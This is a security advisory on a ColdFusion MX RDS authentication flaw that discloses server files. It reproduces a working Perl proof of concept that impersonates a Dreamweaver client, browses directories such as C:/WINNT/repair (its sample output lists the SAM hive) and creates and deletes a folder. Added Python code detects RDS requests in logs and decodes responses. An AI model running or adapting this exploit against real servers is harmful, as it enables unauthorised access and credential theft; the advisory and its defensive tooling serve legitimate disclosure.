Macromedia ColdFusion MX Remote Development Service (RDS) File Disclosure Vulnerability

Published: 2003-07-05
Updated: 2003-07-10

Affected systems:
Macromedia ColdFusion Server MX Professional
Macromedia ColdFusion Server MX Enterprise
Macromedia ColdFusion Server MX Developer
Macromedia ColdFusion Server MX 6.0
Description:
BUGTRAQ ID: 8109

Macromedia ColdFusion MX Server is a powerful web application server that automates the building of sites and web applications.

The RDS service in ColdFusion MX contains a vulnerability that lets a remote attacker access data on the server without authorization, resulting in the disclosure of file information.

ColdFusion RDS lets developers securely access remote files and data sources and debug CFML code. Developers can use RDS from ColdFusion Studio, HomeSite+ and Dreamweaver MX to reach files and databases on a remote development server. Under CFMX, RDS is a Java servlet running in the security context of the CF application server account. When RDS is configured correctly, a password is required to authenticate remote developer access. Because of a flaw in the authentication step of the communication with the ColdFusion MX server, a remote user can reconfigure properties on the development server and use that to access files on the server.
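Because the RDS servlet answers on a fixed path with a recognisable query string, its use is easy to spot in web server logs. The following detection routine is an added example (not part of this advisory or the angrypacket PoC); it assumes IIS W3C extended logging with the fields named in the `#Fields` line, and the log text it scans is constructed sample data.

```python
"""Flag requests to the ColdFusion MX RDS servlet (ide.cfm) in IIS W3C logs.

Added example; it is not part of the NSFOCUS advisory or the angrypacket
PoC. It assumes the standard W3C extended fields named in the #Fields line;
the log text below is constructed sample data, not a real capture.
"""
from urllib.parse import parse_qsl

RDS_STEM = "/cfide/main/ide.cfm"   # RDS entry point used by the PoC on this page

# Constructed sample: one client walking directories via RDS, plus normal traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-07-01 10:30:43 10.0.0.7 POST /CFIDE/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:30:43 10.0.0.7 POST /CFIDE/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:30:45 10.0.0.9 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-07-01 10:30:46 10.0.0.7 POST /CFIDE/main/ide.cfm cfsrv=ide&action=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:30:47 10.0.0.9 GET /CFIDE/main/ide.cfm - 404 Mozilla/4.0+(compatible;+MSIE+6.0)
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names given in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_rds_requests(text):
    """Return {client_ip: {ACTION: count}} for every RDS request (CFSRV=IDE)."""
    hits = {}
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != RDS_STEM:
            continue
        # ColdFusion treats parameter names case-insensitively, so normalise them.
        params = {k.upper(): v for k, v in parse_qsl(rec.get("cs-uri-query", ""))}
        if params.get("CFSRV", "").upper() != "IDE":
            continue
        action = params.get("ACTION", "?")
        per_ip = hits.setdefault(rec["c-ip"], {})
        per_ip[action] = per_ip.get(action, 0) + 1
    return hits


if __name__ == "__main__":
    for ip, actions in find_rds_requests(SAMPLE_LOG).items():
        print(ip, actions)   # expect: 10.0.0.7 {'BrowseDir_Studio': 3}
```

Any hit from an address that is not a known developer workstation deserves a look; RDS should be password-protected or disabled on production servers.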

<*Source: rs2112 (rs2112@hushmail.com)

  Link: http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

Victim1 <victim1@angrypacket.com> provided the following test method:

#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com

## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN,
# I or rs2112 take no responsibility for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against
# attack and that's it.

## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is an "almost" complete emulation of a dreamweaver client connection just FYI,
# in like one full HTTP1/1 session within netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to an *.exe it will attempt to become a
# 16-bit dos application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certain current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically don't bother.
#
# I'm sorry for being such a foil fart but hey, you understand, I'm sure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------


use strict;
use warnings;
use IO::Socket;

our ($response, @clength, @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:                      Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:           Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:                      Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0         Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:     Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:                    Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:    Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:    Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:    Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR:0:                   Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:            Content-Length: 37


# Static Content-Length: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
# Each header below pairs with the request string at the same index in @rarray.
@clength = ( "Content-Length: 46",
         "Content-Length: 28",
         "Content-Length: 47",
         "Content-Length: 46",
         #"Content-Length: 32",
         #"Content-Length: 50",
         "Content-Length: 46",
         "Content-Length: 51",
         "Content-Length: 46",
         "Content-Length: 24",
         "Content-Length: 46",
         "Content-Length: 53",
         "Content-Length: 46",
         "Content-Length: 53",
         "Content-Length: 46",
         "Content-Length: 51",
         "Content-Length: 46",
         "Content-Length: 29",
         "Content-Length: 46",
         "Content-Length: 37"
       );


@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:7:C:/_mm/STR:1:*STR:0:",
        "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        #"3:STR:10:C:/_notes/STR:1:*STR:0:",
        #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:3:C:/STR:1:*STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:8:C:/WINNTSTR:1:*STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
        );



system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT   = "80";
my $STRING = "C:/WINNT/repair";
my $POST   = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";


print "Generating Socket with Array Directory Values.\n";
# Each request string is paired with the Content-Length header at the same index,
# so walk the two arrays in lock-step: one connection per request, in the order
# a Dreamweaver client would send them.
for my $i ( 0 .. $#rarray ) {
    gen_sock($TARGET, $PORT, $rarray[$i], $clength[$i]);
}


sub gen_sock {
    my ($target, $port, $request, $clength_hdr) = @_;
    my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                     PeerPort => $port,
                                     Proto    => 'tcp');
    die "Socket Could not be established ! $!" unless $sock;
    print "Target: $target:$port\n";
    print "$POST\n";
    print "Request String Value: $request\n";
    print "$clength_hdr\n";
    print "Please wait.. ..\n";
    # Headers mimic the Dreamweaver RDS client; the session cookie is never validated (see notes above).
    print $sock $POST;
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $target\r\n";
    print $sock "$clength_hdr\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
    print $sock "\r\n";
    print $sock $request;

    # lets return and print data to term
    while (my $response = <$sock>) {
        chomp($response);
        print "$response\n";
    }
    close($sock);
}




+----------- -- -
+ disclaimer
+-------- -- -
READ IN THE SCRIPT.

Oh and Happy 4th of July !
- -- -------------------------


#EOT
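The request strings and the directory listing in the script's sample output use one length-prefixed encoding, which makes captured RDS traffic hard to read by eye. The decoder below is an added example, not part of the advisory or the angrypacket script; the per-entry field labels are assumptions inferred from the sample output, and the sample data is reconstructed from that output.

```python
"""Decoder for the length-prefixed RDS encoding seen in the script above.
Added example, not part of the advisory or the angrypacket script: a field
count, a colon, then each field as "<len>:<bytes>" (request fields carry an
extra "STR:" tag). Entry labels are assumptions inferred from the capture."""

ENTRY_KEYS = ("type", "name", "attr", "size", "date")  # assumed; 5 fields per entry


def decode_rds(payload):
    """Return the fields of one RDS request or response, or raise ValueError."""
    count, sep, rest = payload.partition(":")
    if not sep or not count.isdigit():
        raise ValueError("missing field count")
    fields, pos = [], 0
    for _ in range(int(count)):
        if rest.startswith("STR:", pos):        # typed field (request side)
            pos += 4
        end = rest.find(":", pos)
        if end < 0 or not rest[pos:end].isdigit():
            raise ValueError(f"bad length prefix at offset {pos}")
        length, pos = int(rest[pos:end]), end + 1
        if pos + length > len(rest):            # never trust the length to fit the buffer
            raise ValueError("payload truncated")
        fields.append(rest[pos:pos + length])
        pos += length
    return fields


def dir_entries(response):
    """Group a BrowseDir_Studio response into one record per directory entry."""
    fields = decode_rds(response)
    if len(fields) % len(ENTRY_KEYS):
        raise ValueError("field count is not a multiple of %d" % len(ENTRY_KEYS))
    return [dict(zip(ENTRY_KEYS, fields[i:i + 5])) for i in range(0, len(fields), 5)]


# Constructed from the capture reproduced in the PoC comments (C:/WINNT/repair).
SAMPLE_REQUEST = "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
SAMPLE_RESPONSE = (
    "50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,0"
    "2:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,0"
    "2:F:3:sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,0"
    "2:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,0"
    "2:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0"
)

if __name__ == "__main__":
    print(decode_rds(SAMPLE_REQUEST))            # ['C:/WINNT/repair', '*', '']
    for entry in dir_entries(SAMPLE_RESPONSE):   # 10 entries, e.g. sam is 20480 bytes
        print(entry["name"], entry["size"])
```

Running it over a captured response shows exactly which file names and sizes were disclosed, which is what an incident responder needs to scope the exposure.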

Recommendation:
Vendor patch:

Macromedia
----------
The vendor has not yet released a patch or upgrade. Users of this software should watch the vendor's home page for the latest version:

http://www.macromedia.com/

This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.